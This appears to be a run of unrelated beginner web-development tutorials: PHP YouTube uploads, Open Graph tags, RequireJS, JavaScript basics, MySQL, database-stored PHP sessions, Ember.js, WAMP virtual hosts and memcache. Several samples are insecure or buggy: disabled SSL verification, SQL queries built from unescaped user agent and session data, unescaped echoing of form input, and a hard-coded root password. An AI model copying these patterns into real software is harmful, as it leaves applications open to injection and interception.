Let’s begin with the codes

First, we would need our YouTube account and your developer key,

$youtube_email = "youtube-email"; // Change this to your youtube sign in email.
$youtube_password = "your-youtube-password"; // Change this to your youtube sign in password.
    // Developer key: Get your key here: http://code.google.com/apis/youtube/dashboard/.
$key = "your-dev-key";

Next we need to setup CURL to access YouTube servers and login.

    $source = 'Akpos Jokes'; // A short string that identifies your application for logging purposes.
    $postdata = "Email=".$youtube_email."&Passwd=".$youtube_password."&service=youtube&source=" . $source;
    $curl = curl_init( "https://www.google.com/youtube/accounts/ClientLogin" );
    curl_setopt( $curl, CURLOPT_HEADER, "Content-Type:application/x-www-form-urlencoded" );
    curl_setopt( $curl, CURLOPT_POST, 1 );
    curl_setopt( $curl, CURLOPT_POSTFIELDS, $postdata );
    curl_setopt( $curl, CURLOPT_SSL_VERIFYPEER, 0 );
    curl_setopt( $curl, CURLOPT_RETURNTRANSFER, 1 );
    curl_setopt( $curl, CURLOPT_SSL_VERIFYHOST, 1 );
    $response = curl_exec( $curl );
    curl_close( $curl );

Below is the code that enables us to get our Access Token and username from YouTube.

list( $auth, $youtubeuser ) = explode( "\n", $response );
list( $authlabel, $authvalue ) = array_map( "trim", explode( "=", $auth ) );
list( $youtubeuserlabel, $youtubeuservalue ) = array_map( "trim", explode( "=", $youtubeuser ) );

Once we are authenticated and have gotten our Token we need to begin uploading the videos. Here is the Schema:

<?xml version="1.0"?>
<entry xmlns="http://www.w3.org/2005/Atom"
  xmlns:media="http://search.yahoo.com/mrss/"
  xmlns:yt="http://gdata.youtube.com/schemas/2007">
  <media:group>
    <media:title type="plain">Bad Wedding Toast</media:title>
    <media:description type="plain">
      I gave a bad toast at my friend's wedding.
    </media:description>
    <media:category
      scheme="http://gdata.youtube.com/schemas/2007/categories.cat">People
    </media:category>
    <media:keywords>toast, wedding</media:keywords>
  </media:group>
</entry>

Now, to push this in PHP we do this:

$youtube_video_title = $video_title; // This is the uploading video title.
    $youtube_video_description = $video_description; // This is the uploading video description.   
    $youtube_video_keywords = "jokes ".$video_keywords; // This is the uploading video keywords.
    $youtube_video_category = "Comedy"; // This is the uploading video category. There are only certain categories that are accepted. See below 
    
    $data = '<?xml version="1.0"?>
                <entry xmlns="http://www.w3.org/2005/Atom"
                  xmlns:media="http://search.yahoo.com/mrss/"
                  xmlns:yt="http://gdata.youtube.com/schemas/2007">
                  <media:group>
                    <media:title type="plain">' . stripslashes( $youtube_video_title ) . '</media:title>
                    <media:description type="plain">' . stripslashes( $youtube_video_description ) . '</media:description>
                    <media:category
                      scheme="http://gdata.youtube.com/schemas/2007/categories.cat">'.$youtube_video_category.'</media:category>
                    <media:keywords>'.$youtube_video_keywords.'</media:keywords>
                  </media:group>
                </entry>';

    $headers = array( "Authorization: GoogleLogin auth=".$authvalue,
                 "GData-Version: 2",
                 "X-GData-Key: key=".$key,
                 "Content-length: ".strlen( $data ),
                 "Content-Type: application/atom+xml; charset=UTF-8" );

$curl = curl_init( "http://gdata.youtube.com/action/GetUploadToken");
curl_setopt( $curl, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"] );
curl_setopt( $curl, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $curl, CURLOPT_TIMEOUT, 10 );
curl_setopt( $curl, CURLOPT_SSL_VERIFYPEER, false );
curl_setopt( $curl, CURLOPT_POST, 1 );
curl_setopt( $curl, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $curl, CURLOPT_HTTPHEADER, $headers );
curl_setopt( $curl, CURLOPT_POSTFIELDS, $data );
curl_setopt( $curl, CURLOPT_REFERER, true );
curl_setopt( $curl, CURLOPT_FOLLOWLOCATION, 1 );
curl_setopt( $curl, CURLOPT_HEADER, 0 );

$response = simplexml_load_string( curl_exec( $curl ) );
curl_close( $curl );

Once we get the response after setting our Category, Video Title, Description and keywords, we get a token that allows up to upload the video file to YouTube’s servers.

The $response variable receives the response from YouTube and we can then access all the information we need to upload the video e.g $response->token is our token $response->url is the url where we upload the video file to.

Here are the acceptable categories for a video on YouTube:

        Film
        Autos
        Music
        Animals
        Sports
        Travel
        Shortmov
        Games
        Videblog
        People
        Comedy
        Entertainment
        News
        Howto
        Education
        Tech
        Nonprofit
        Movies
        Movies_anime_action
        Movies_action_adventure
        Movies_classics
        Movies_comedy
        Movies_documentary
        Moves_drama
        Movies_family
        Movies_foreign
        Movies_horror
        Movies_sci_fi_fantasy
        Movies_thriller
        Movies_shorts
        Shows
        Trailers

The uploading process

The response we get from this allows us to get the url to upload the video to. Now to upload the video, we need a form and the YouTube url where our video will be uploaded to.

Here is our upload form.

<body>
        
        <?php        
        //If the 1st step form has been submited, run the token script.
        if( isset( $_POST['video_title'] ) && isset( $_POST['video_description'] ) ) {
            $video_title = stripslashes( $_POST['video_title'] );
            $video_description = stripslashes( $_POST['video_description'] );
      $video_keywords = stripslashes( $_POST['video_keywords'] );
            include_once( 'get_youtube_token.php' ); //this gets our $response above
        }
        
        // Specifies the url that youtube will return to. The data it returns are as get variables         
        $nexturl = "http://your-url/";
        // These are the get variables youtube returns once the video has been uploaded.
        $unique_id = $_GET['id'];
        $status = $_GET['status'];
        ?>
        
        <!-- Step 1 of the youtube upload process -->
        <?php if( empty( $_POST['video_title'] ) && $unique_id == "" ) : ?>                    
            <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">                
                <label for="video_title">Video Title</label>
                <input type="text" name="video_title" maxlength="100" />
                <label for="video_description">Video Description</label>
                <textarea id="video-description" maxlength="2000" name="video_description"></textarea>
         <label for="video_title">Video Keywords(e.g jokes, funny, etc)</label>
                <input type="text" name="video_keywords" maxlength="20"/>
                <input type="submit" value="Step 2" />
            </form> <!-- /form -->

        <!-- Step 2 -->           
        <?php elseif( $response->token != '' ) : ?>                        
            <h4>Title:</h4>
            <p><?php echo $video_title; ?></p>
            <h4>Description:</h4>
            <p><?php echo $video_description; ?></p>
       <h4>Keywords:</h4>
            <p><?php echo $video_keywords; ?></p>
            <form action="<?php echo( $response->url ); ?>?nexturl=<?php echo( urlencode( $nexturl ) ); ?>" method="post" enctype="multipart/form-data">
                <p class="block">
                    <label>Upload Video</label>
                    <span class="youtube-input">
                        <input id="file" type="file" name="file" />
                    </span>                        
                </p>
                <input type="hidden" name="token" value="<?php echo( $response->token ); ?>"/>
                <input type="submit" value="Upload Video" />
            </form> <!-- /form -->
            
        <!-- Final Step -->
        <?php elseif( $unique_id != '' && $status = '200' ) : ?>        
        <div id="video-success">
            <h4>Video Successfully Uploaded!</h4>
            <p>Here is your url to view your video:<a href="http://www.youtube.com/watch?v=<?php echo $unique_id; ?>" target="_blank">http://www.youtube.com/watch?v=<?php echo $unique_id; ?></a></p>
        </div> <!-- /div#video-success -->
        <?php endif; ?>
        
    </body>

Basically, what we did above is to get our upload url $response->url and token and then send our video to that url. A status code 200 shows that our upload was successful.

<?xml version='1.0' encoding='UTF-8'?>
<response>
  <url>http://uploads.gdata.youtube.com/action/FormDataUpload/AEF3087AUD<url>
  <token>AEwbFAQEvf3xox...</token>
</response>

You need to add the nexturl parameter to the form’s target URL. This parameter specifies the URL to which YouTube will redirect the user’s browser when the user uploads his video file. After the video is uploaded in the browser, the user will be redirected to the nexturl URL

I have attached the full source code to this article for you to work with.

Comment below if you have any issues or questions.

“You must be either the copyright holder or the authorized representative of the copyright owner for all video files that you deliver to YouTube. Similarly, users who upload videos to YouTube from your site must be either the copyright holder or the authorized representative of the copyright owner for all videos that they upload.” – YouTube.

The buttons by default share an image on the current page of the site and an excerpt with a link back to your site. Most times shared buttons get it right. They picked the right image with the right content. But when they get it wrong, it could cause you a bit of harm.

Some of the share buttons implement an image picker where the person sharing can choose from a range of images or simply delete the image. The Facebook share buttons by default do not offer this (to the best of my knowledge as at this time) and this could also cause a wrong image to object mapping if you also use the Facebook recommendation box on your site.

Facebook is not ignorant of this as they have made provision to correct or ensure the right image to object mapping is done. Add the following Open Graph protocol <meta> tags to the head of your webpages with their respective values.

<meta property="og:title" content="Title of content"/>
<meta property="og:url" content="current url"/>
<meta property="og:image" content="url to image"/>
<meta property="og:site_name" content="Name of site"/>
<meta property="og:description" content="Description of site or content"/>

• og:title – The title of your object.
• og:image – An image URL which should represent your object within the graph. The image must be at least 50px by 50px, although a minimum 200px by 200px is preferred and 1500px by 1500px is recommended for the best possible user experience. The image can have a maximum aspect ratio of 3:1. Supported formats are PNG, JPEG and GIF. You may include multiple og:image tags to associate multiple images with your page. (Note: image sizes must be no more than 5MB in size.)
• og:url – The canonical URL of your object

Note: If you are implementing this on an already running site, it may take a while for you to start noticing changes.

Click here to learn more about Open Graph protocol

The AMD format comes from wanting a module format that was better than today’s “write a bunch of script tags with implicit dependencies that you have to manually order” and something that was easy to use directly in the browser. Something with good debugging characteristics that did not require server-specific tooling to get started. It grew out of Dojo’s real world experience with using XHR+eval and and wanting to avoid its weaknesses for the future.
It is an improvement over the web’s current “globals and script tags” because:
Uses the CommonJS practice of string IDs for dependencies. Clear declaration of dependencies and avoids the use of globals.
IDs can be mapped to different paths. This allows swapping out implementation. This is great for creating mocks for unit testing. For the above code sample, the code just expects something that implements the jQuery API and behavior. It does not have to be jQuery.
Encapsulates the module definition. Gives you the tools to avoid polluting the global namespace.
Clear path to defining the module value. Either use “return value;” or the CommonJS “exports” idiom, which can be useful for circular dependencies.
It is an improvement over CommonJS modules because:
It works better in the browser, it has the least amount of gotchas. Other approaches have problems with debugging, cross-domain/CDN usage, file:// usage and the need for server-specific tooling.
Defines a way to include multiple modules in one file. In CommonJS terms, the term for this is a “transport format”, and that group has not agreed on a transport format.
Allows setting a function as the return value. This is really useful for constructor functions. In CommonJS this is more awkward, always having to set a property on the exports object. Node supports module.exports = function () {}, but that is not part of a CommonJS spec.

culled from RequireJS

Now we will create a simple application called nairaland application what it does is simply list all the banned members from the Database(obviously lietral objects) but we will do it in a manner that is modular and easy to do.
first create a simple html.

<html>
<head>
<title></title>
</head>
<body>
</body>
</html>

Download the require.js file and in the html add the file with the tag
<script src="require.js" type="text/javascript"></script>
Next we need to create the nairaland application so we create a js file called “nairaland.js”

define(["banned"],function(e){

  var obj= {
    forum:"Nairaland",
    country:"Nigeria",
    type:"Open Forum",
    owner:"Seun Orewa",
    hasMultiRooms:true,
    bannedMembers:e.getBannedMember()
    
  };

  return obj;
});

Banned Class
we will create another file called “banned.js”

define(function(){
        //bannedMembers is a literal Object that holds an array which holds an Objects of data which represents our banned Entity in Real Life Applications these source can from Ajax,LocalStorage or even SqLite
  var bannedMembers={
    list:[{
        name:"dhtml",
           meta:{
      reason:'attempting to hack nairaland and spanbot-killer',
      banned_durations:'2 weeks',
      limited_access:'true'
          }

        },
        {
        name:"yawatode",
           meta:{
      reason:'too much SEO advise :',
      banned_durations:'2 weeks',
      limited_access:'true'
          }

        },
        {
        name:"donpuzo",
           meta:{
      reason:'Disturbing potential female programmers on nairaland',
      banned_durations:'4 weeks',
      limited_access:'true'
          }

        },
         {
        name:"omo_to_dun",
           meta:{
      reason:'SpamBot personal reason',
      banned_durations:'4 weeks',
      limited_access:'true'
          }

        }]
  }

      
    

//create an object that returns a the list through the use of Closure
return {
  getBannedMember:function(){
    return bannedMembers.list;
  }
};
});

define(["banned"],function(e){

}

now our “e” is the result of banned.js which is our object now thanks to this pattern i no longer have to worry about my empty object being attached to Global object,”e” is my banned Object which returned after loading the “banned.js”.
e.getBannedMember()
so i now have access to the method with ease and this is awesome because if i wanted to change the implementation i can easily go to banned.js and change what i what.

How to Use in the HTML Page

//You can attach this to a jQuery Ready or Document.onload function when the DOM is ready to use
require(["nairaland"],function(a){
//code goes here
});

require(["nairaland"],function(a){ //remember a is the nairaland object
                //a.bannedMembers takes the list from the return method of getBannedMembers so a.bannedMembers is an array

                //an array has a function forEach that allows you iterate over its item it takes a function with item as the argument
    a.bannedMembers.forEach(function(item){
                //this will get the div with the id list
    var doc=document.getElementById('list');
                //appends to the html values from the object
    doc.innerHTML+='<p>Banned Member Name:'+item.name+'</p><hr />';
                //now remember that the banned members is an array of objects in each item in the array is an object with name and meta and meta
                //is also an object so we traverse/scan each property in the meta object
               //for in is used for objects where i the property, you should know that function is also a property think of it as a hash dictionary obj['onclick']

                //dump our datas and thats all
    for(var i in item.meta){
      doc.innerHTML+="<p><strong>"+i+"</strong>=>"+item.meta[i]+"</p>";
    }
    doc.innerHTML+="<hr />";
      
    });
  });

NOTE: i have attached the files for this Tutorial, you might ask why bother ? well you should bother if you really love to write clean codes and also a little bit of secret; getting comfy with AMD is a step closer to learning all frameworks even NodeJS as most frameworks are adopting the AMD pattern, even the DojoToolkit.

JavaScript Frameworks are codes, functions, paradigms written in ways to help developers create short codes with maximum compatibility. They are structured in such a way that non-JavaScript users can easily grasp the codes with little lines; However due to the fact that developers are more familiar with the framework than the language itself, coders often get frustrated especially when they get errors that offer little or no explanation. We will cover certain aspects of JavaScript and good practices to adhere to.

According to Sang Shin he defined “DOM” as

The HTML DOM defines a standard set of objects for HTML, and a standard way to access and manipulate HTML documents.

All HTML elements, along with their containing text and attributes, can be accessed through the DOM.

The contents can be modified or deleted, and new elements can be created.

The HTML DOM is platform and language independent. It can be used by any programming language like Java, JavaScript, and VBScript

The Document Object Model (DOM) is a powerful tool for manipulating Documents and elements in the browser, however DOM Manipulation is quite tricky and complex and various client browser support certain features and some don’t, which is where frameworks come in, they handle the compatibility issue leaving you to focus on the logical layer. However a good insight into DOM is worth your time.

Understanding Objects and Functions

JavaScript is quite confusing especially when it comes to defining Functions and Objects, languages like PHP, Ruby and C defines functions as a method (performing an action). However in JavaScript it is quite different, the single tip i will give you to memorize is that

EVERY FUNCTION IS AN OBJECT

Functions in JS are first class objects according to Sang Shin.

Functions can contain variables and function (closure) like Objects. Functions can perform the same operations as objects. A function is a type of Object.

//Creating a Simple Function in JS
function MyFunc(value)
{
    alert(value);
}
//Now Lets’s Add Some Variables like An Object Does
function MyFunc(value)
{
    if(value)
    {
        this.innervar=value;
    }
    return this.innervar;
}
//Another Way of Calling a Function
var Test=function(value)
{
    alert("I am a function");
}
//Calling the Function
Test(); //I am a function

(function(){
    alert("I will Run first before any function if not attached to any event handler");
})

What the Hell is – “THIS”

Unlike other programming languages this in PHP, C, C++, Java refers to the Class, however in JavaScript carrying that knowledge will throw you into an abyss of frustration and confusion. At times you might begin to doubt your intellect but don’t; the this keyword in JS refers to an Object calling a method.

var car=new function()
{
    car.model="toyota";
    // this adds a variable ”model” to the car Object

    this.color="red"
    //However at this level this refers to the Car Object so this is far more preferable
}

Knowing Your Objects

For the sake of simplicity, I will not jump into an in-depth explanation of Objects because JavaScript is basically all about Objects, a brief introduction and use will suffice. Objects are easy to create however in certain languages Objects cannot have dynamic properties added to it, but JS does.

//Creating an Object the traditional way
var phone=new Object();
phone.name="Android";
phone._isFlashSupported=true;
phone._3dEnabled=true;
phone.storeName="Android Marketplace";
//Calling the Phone name is as easy calling
alert phone.name //Android

function Phone(name,flash,hardware,appstore)
{
    this.name=name;
    this._isFlashSupported=flash;
    this._3dEnabled=hardware;
    this.appstore=appstore;
}
var Nokia=new Phone("Symbian",true,true,"OviStore");
console.log(Nokia.name); //prints Symbian

var Apple={
    name:"IOS Apple",
    isFlashSupported:"Never Will",
    _3dEnabled:true,
    appstore:"AppStore"
}
var apple=new Apple(); //throws an Error Apple has no Constructor

//Proper use
console.log(Apple.name); //IOS Apple

Apple.name="Apple OS";
console.log(Apple.name); //it overwrites the previous IOS,

Understanding Prototypes

Prototype is one of the most vital and important aspect of JavaScript, prototype allows user to extends [Function Objects]. Prototype is very essential especially to developers hoping to create plugins, frameworks and reusable Objects. Without much words allow me to proof the power of prototype.

//We will create a function to be extended to all String Objects
function countV(){
    //store Object
    var StringObj=this; 
    //Because countV is a function that will extend the String Object this will refer to the String itself if
    //Our Json Object to Hold Data this is more efficient as you can return multiple results in one Object
    var letter={vowel:0,consonant:0};
    //Our loop
    for(var i=0; i < StringObj.length; i++) //Remember StringObj holds the String Object
    {
        //This will compare the characters and determine which is consonant and vowel by updating the Json Object
        if(StringObj[i] == "a" || StringObj[i] =="e" || StringObj[i] =="i" ||StringObj[i] =="o" || StringObj[i] =="u")
            letter.vowel++; //increment the data by 1 if vowel found
        else
            letter.consonant++; //increment the data by 1 if consonant found
    }
    //do not use this.letter because this means String and letter is not an Object of String its an inner variable so we simple use letter
    return letter;
}
//This Injects the function into the String Object so any String Object will be able to call count
String.prototype.count=countV;
//Testing Our function
var r=new String("Welcome");
console.log(r.count()) //returns the letter Json data
console.log(r.count().vowel) //returns vowel

Grasping Closure

The Closure concept is quite confusing at times and can be difficult to grasp. Closures are inner functions that use variables that resides outside of the function.

var message="pc guru at Nairaland";
function sayMessage()
{
    function _innerClosure()
    {
        return message; //returns message to the function _innerClosure
    }
    return _innerClosure(); //returns the return value from innerClosure to sayMessage attempt removing the return here
}

What About Classes and Inheritance?

Yes, classes and inheritance are another vital and important feature worth knowing, however many frameworks have better ways of making classes and inheritance much more easier and saner than JavaScript’s way. Examples of such frameworks are the “Dojo Toolkit”, “Mootools” and any other framework that provides that interface, with this guidelines you will have a good foundation on some aspect of JavaScript as most will aid you to better understanding what framework to use.

However as at Jquery 1.4 there are no in-built methods to emulate classes and inheritance except to extend the Jquery Object itself, though such a plug-in should exist, as the jquery community strives hard to come up with plugins to strengthen the toolkit.

To create a database from PHP, the user of your scripts will need to have fullCREATE/DROP priveleges on MySQL. That means anyone who can get hold of your scripts can potentially blow away all your databases and their contents with the greatest of ease. This is not such a great idea from a security standpoint.

If you are even considering creating databases with PHP, do yourself a big favour and at least don’t store the database username and password in a text file. Make yourself type your database username and password into a form and pass the variables to the inserting handler each and every time you use this script. This is one case where keeping the variables in an include files outside your web tree is not sufficient precaution. Better yet, run the scripts manually from the command line through SSH:
mysql-u <username> -p <databasename> <sql-script.sql
for those times when you need to create database programmatically, the relevant functions are: mysql_create_db():create a database on the designated host, with name specified arguments
mysql_drop_db(): Delete the specified database
mysql_query():passes table definitions and drops in this function

A bare-bones database-generation script might look like this:

<?php
    $linkID=mysql_connect('localhost','root', 'sesame'); mysql_create_db('new_db',$linkID); 
    mysql_select_db('new_db'); 
    $query="CREATE TABLE new_table 
    ( id INT NOT NULL AUTO_INCREMENT PRIMARY KEY, new_col VARCHAR(25) )"; 
    $result=mysql_query($query); 
    $axe=mysql_drop_db('new_db');
?>

Several other GUI tools are available that are not database-specific but will probably work with MySQL. As MySQL has become more and more popular, a number of applications for both windows and Linux have come into play that allow you to administer MySQL databases in the graphical fashion you may have become accustomed to. Like their web counterparts, these applications offer full administrative control, but without the headache of exposing yourself to the security risk of web based interface .

Hope you find this video useful and remember to read Improve your web application performance with Memcache to get a basic understanding of Memcached.

While the default session storage mechanism is adequate for many developers, you might find yourself wanting to modify its behavior from time to time. One of the most common reasons for wanting to change the default behavior is that the application needs to be able to run on multiple servers without server affinity (methods that direct requests from the same client to the same server). An easy way to make sure that sessions continue to work properly is to store sessions in a central database that is common to all servers.

Also the application needs to be able to run on a shared host, where there are significant security concerns associated with storing session data in the filesystem, therefore storing sessions in a database will make this safer.

PHP makes storing sessions in a database easy while still working with your common $_SESSION variable in PHP across your applications.

Here I have a simple class you can include in all your projects to store your sessions across your applications in a database.

First we need to create our session table. Just run this SQL script to create your session table, provided you already have a database you want to use.

CREATE TABLE IF NOT EXISTS `sessions` (
  `id` int(32) NOT NULL AUTO_INCREMENT,
  `http_user_agent` text NOT NULL,
  `hash` varchar(50) NOT NULL,
  `session_expire` int(50) NOT NULL,
  `session_data` text NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=0;

Next is the session class "session.class.php" that we will use.

class Session
{

    /**
     *  Constructor of class
     *
     *  @return void
     */
    function Session()
    {
    
        // set session lifetime
        $this->sessionLifetime = 3600; //this is 1hr
        // register the new handler
        
        session_set_save_handler(
            array(&$this, 'open'),
            array(&$this, 'close'),
            array(&$this, 'read'),
            array(&$this, 'write'),
            array(&$this, 'destroy'),
            array(&$this, 'gc')
        );
        register_shutdown_function('session_write_close');
        
        // start the session
        session_name('mysite'); // you can give your session id a name.
        session_start();
        
    }
    
    /**
     *  Regenerates the session id.
     *
     *  <b>Call this method whenever you do a privilege change!</b>
     *
     *  @return void
     */
    function regenerate_id()
    {

        // saves the old session's id
        $oldSessionID = session_id();
        
        // regenerates the id
        // this function will create a new session, with a new id and containing the data from the old session
        // but will not delete the old session
        session_regenerate_id();
        
        // because the session_regenerate_id() function does not delete the old session,
        // we have to delete it manually
        $this->destroy($oldSessionID);
        
    }

    /**
     *  Custom open() function
     *
     *  @access private
     */
    function open($save_path, $session_name)
    {
    
        return true;
        
    }
    
    /**
     *  Custom close() function
     *
     *  @access private
     */
    function close()
    {
        $this->gc($this->sessionLifetime); //do garbage collection
        return true;
    }
    
    /**
     *  Custom read() function
     *
     *  @access private
     */
    function read($session_id)
    {

        // reads session data associated with the session id
        // but only if the HTTP_USER_AGENT is the same as the one who had previously written to this session
        // and if session has not expired
        $result = @mysql_query("
            SELECT
                session_data
            FROM
                sessions
            WHERE
                hash = '".$session_id."' AND
                http_user_agent = '".$_SERVER["HTTP_USER_AGENT"]."' AND
                session_expire > '".time()."'
        ");
        
        // if anything was found
        if (is_resource($result) && mysql_num_rows($result) > 0) {

            // return found data
            $fields = mysql_fetch_assoc($result);
            // don't bother with the unserialization - PHP handles this automatically
            return $fields["session_data"];
            
        }
        
        // if there was an error return an epmty string - this HAS to be an empty string
        return "";
        
    }
    
    /**
     *  Custom write() function
     *
     *  @access private
     */
    function write($session_id, $session_data)
    {
    
        // first checks if there is a session with this id
        $result = @mysql_query("
            SELECT
                *
            FROM
                sessions
            WHERE
                hash = '".$session_id."'
        ");
        
        // if there is
        if (mysql_num_rows($result) > 0) {

            // update the existing session's data
            // and set new expiry time
            $result = @mysql_query("
                UPDATE
                    sessions
                SET
                    session_data = '".$session_data."',
                    session_expire = '".(time() + $this->sessionLifetime)."'
                WHERE
                    hash = '".$session_id."'
            ");
            
            // if anything happened
            if (mysql_affected_rows()) {
            
                // return true
                return true;
                
            }

        // if this session id is not in the database
        } else {

            // insert a new record
            $result = @mysql_query("
                INSERT INTO
                    sessions
                        (
                            hash,
                            http_user_agent,
                            session_data,
                            session_expire
                        )
                    VALUES
                        (
                            '".$session_id."',
                            '".$_SERVER["HTTP_USER_AGENT"]."',
                            '".$session_data."',
                            '".(time() + $this->sessionLifetime)."'
                        )
            ");
            
            // if anything happened
            if (mysql_affected_rows()) {
            
                // return an empty string
                return "";
                
            }
            
        }
        
        // if something went wrong, return false
        return false;
        
    }
    
    /**
     *  Custom destroy() function
     *
     *  @access private
     */
    function destroy($session_id)
    {

        // deletes the current session id from the database
        $result = @mysql_query("
            DELETE FROM
                sessions
            WHERE
                hash = '".$session_id."'
        ");
        
        // if anything happened
        if (mysql_affected_rows()) {
        
            // return true
            return true;
            
        }

        // if something went wrong, return false
        return false;
        
    }
    
    /**
     *  Custom gc() function (garbage collector)
     *
     *  @access private
     */
    function gc($maxlifetime)
    {
    
        // it deletes expired sessions from database
        $result = mysql_query("
            DELETE FROM
                sessions
            WHERE
                session_expire < '".(time() - $maxlifetime)."'
        ");
        
    }
    
}

Here is how we include this class in all our websites. This should most likely reside in a general class included in all the sites script.

include( "session.class.php" );
$session = new Session();

Conclusion

It is a relatively straightforward process to switch the recording of session data from files to a database. Here the session data is more secure as a potential hacker must be able to log into the database before he can access anything, the use of multiple servers would not create a problem as all session data now resides in a single central place and is accessible by all servers.

It is also easier to query the database if you require information about current sessions or current users.

Hope you now know why its a good practice to store your sessions in a database. Please comment below to give suggestions and if you have any issues implementing this code.

Hey! This article references a pre-release version of Ember.js. Now that Ember.js has reached a 1.0 API the code samples below are no longer correct and the expressed opinions may no longer be accurate.

In the past few years, web development has gradually evolved from having your server-side web framework render your views and template. Modern web apps now put the bulk of the logic on the client side to enhance performance and user experience. This, if you’re not careful or experienced enough, can greatly slow down things and defeat the whole purpose of the shift. A number of JavaScript MVC frameworks like Backbone, Knockout, and Ember have sprung up to fill the void between beginner and intermediate developers, and hardcode programmers as well as increase efficiency.

Ember.js is a JavaScript framework for creating ambitious web applications that eliminates boilerplate and provides a standard application architecture. Ember is relatively new (though it started as a library called SproutCore, developed by Apple as the “core” of it’s online applications like Mobile Me) and therefore still has a small but fast growing community.

What you should know

Ember.js is not an outright substitute for jQuery but is built on the jQuery library. In other words, the jQuery library is required for Ember powered applications. Hence jQuery developers will have little or no problem following this framework. I myself am pretty new at this. Came across Ember while I was researching javascript frameworks and I find it has some pretty amazing features like data binding and eliminating boilerplates.

Oh! before you go further its best you have an understanding of web technologies such as html, javascript and the jQuery library.

Let’s get started

First download the Ember.js starter kit. Unzip it and put it in a directory that’s web accessible. Open the index.html and js/app.js in a text editor. In js/app.js you should find the code below:

var App = Em.Application.create();

App.MyView = Em.View.extend({
  mouseDown: function() {
    window.alert("hello world!");
  }
});

StackArena = Ember.Application.create({
  ready: function(){
    alert('Welcome to Ember.js!');
  }
});

StackArena.Tutorial = Ember.Object.extend({
  title: null,
  author: null
});

StackArena.TutorialController = Ember.ArrayController.create();

This is an implicit declaration of the ArrayController. It contains a content array where the data will be stored. An explicit declaration is as follows:

StackArena.TutorialController = Ember.ArrayController.create({
  content: []
});

<script type="text/x-handlebars">
    {{#view Ember.Button target="StackArena.TutorialController" action="loadTutorials"}}
    Load Tutorials
    {{/view}}
    
    {{#collection contentBinding="StackArena.TutorialController" tagName="ul"}}
    <b>{{content.title}}</b> - {{content.author}}
    {{/collection}}
</script>

Time to add some data:

StackArena.TutorialController = Ember.ArrayController.create({
  content: [],
  loadTutorials: function(){
    var self = this;
    $.getJSON('data/Tutorials.json', function(data) {
      data.forEach(function(item){
        self.pushObject(StackArena.Tutorial.create(item));
      });
    });
  }
});

The data will be provided in JSON format. Reload the page click the Load Tutorials button and see how the action performs. Download the complete project from the resources below. That’s it for our simple example on Ember.js.

If this article was interesting, or helpful, or even wrong in anyway, please consider leaving a comment. Thanks!

Lets assume we want to create a virtual host for our website “stackarena” located at C:\wamp\www\stackarena\ so that we can access it from our browser using http://stackarena.localhost/. Here is how we can do that.

First we navigate to "C:\windows\system32\drivers\etc". Once there, you should see a file titled “hosts”. Open that file with a text editor like notepad. You may have to change the open dialog to “all files” in order to see it. You should see a line that looks like this:
127.0.0.1 localhost
add
127.0.0.1 stackarena.localhost bellow that line.

You can add as many entries as you like and your browser should display your WAMP Server site for all of them. Save your hosts file and try visiting http://stackarena.localhost” in your browser. You should see your WAMP site index page.

Now lets configure our virtual hosts.

WAMP configures Apache to serve a single site that usually lives in “C:\wamp\www”. Apache can handle multiple sites if we tell it where to look. To open your WAMP Server Apache configuration, left-click the WAMP Server icon and select “Apache – httpd.conf”.

Look for a line that has:
#Include conf/extra/httpd-vhosts.conf
now remove the # sign from that line and save the file. This will enable Virtual hosts for WAMP.

Next, navigate to C:\wamp\bin\apache\apache2.2.11\conf\extra and open the file “httpd-vhosts.conf”. Scroll all the way to the bottom of this file and remove all dummy virtual host entries and add the code bellow.

<VirtualHost *:80>
  DocumentRoot C:/wamp/www/stackarena/
  ServerName stackarena.localhost
</VirtualHost>

You should now have something like this:

#
# Virtual Hosts
#
# If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at 
# <URL:http://httpd.apache.org/docs/2.2/vhosts/>
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.

#
# Use name-based virtual hosting.
#
NameVirtualHost *:80

<VirtualHost *:80>
  DocumentRoot C:/wamp/www/
  ServerName localhost
</VirtualHost>

<VirtualHost *:80>
  DocumentRoot C:/wamp/www/stackarena/
  ServerName stackarena.localhost
</VirtualHost>

The first of these directives is needed to preserve the dashboard i.e the WAMP server homepage. The second directive is the virtual host, for which we have the directory “C:/wamp/www/stackarena/”.

In order to create additional virtual hosts, we’ll just repeat the steps again for a new website.

Finally, restart Apache and verify that you can access the website through the virtual host name. After restarting Apache using WAMP Server you should be able to access http://stackarena.localhost/ using your web browser.

Basically, memcache allows you to store any form of data in a ‘temporary cache’ so whenever you perform a database query, instead of just connecting to the database and getting the data, you check memcache to see if the data is already stored in the cache. If you do not get any data, you can then go to the database and execute the query.

Before using memcache, make sure you check the time your normal query executes and compare it with a cached version. Sometimes, memcache may be a bit slower running high yield queries especially if the database is already caching items.

Once you have memcache installed on your server, you can start caching stuffs! You can download memcache here http://memcached.org/

Here are some of the functions you might use in memcache

get() : gets the value for a key
set() : sets a key with a given value
add() : adds to the cache, only if it doesn’t exist
replace() : sets in the cache only if the key already exists
flush() : removes all keys and cached data

Lets look at a simple example

// new Memcache instance
$memch = new Memcache;
// connecting to our server on port 11211
$memch->connect('127.0.0.1', 11211) or die ("Could not connect");
//now we will create a key to save our data
$agekey = "UserAge";
// the data contained in the $agekey variable
$agedata = "24";
$memch->set($agekey, $agedata, true, 200); // Store the result of the query for 200 seconds
// This will get the data back from memcache
$result = $memch->get($agekey);
echo $result; //this will return 24

The code above shows a simple implementation of memcache and how to store and receive data from memcache. Now let’s do a real life example with SQL queries.

Let’s say we have a query to retrieve data from the database, how do we implement memcache on that? In the code below, I’ll explain how to use memcache to retrieve results and what to do when the result is not cached.

//Lets assume we have this sql query that retrieves the ages of 20 people we want to execute
$sql = "SELECT * FROM Members WHERE age > 16 LIMIT 20";
// we will create the hash key for that query
  $agekey = md5($sql);

// next we connect to memcache server
  $memch = new Memcache;
  $memch->connect('127.0.0.1', 11211) or die ("Could not connect");

//we need to findout if we already have the ages cached
  $result = $memch->get($agekey);
 
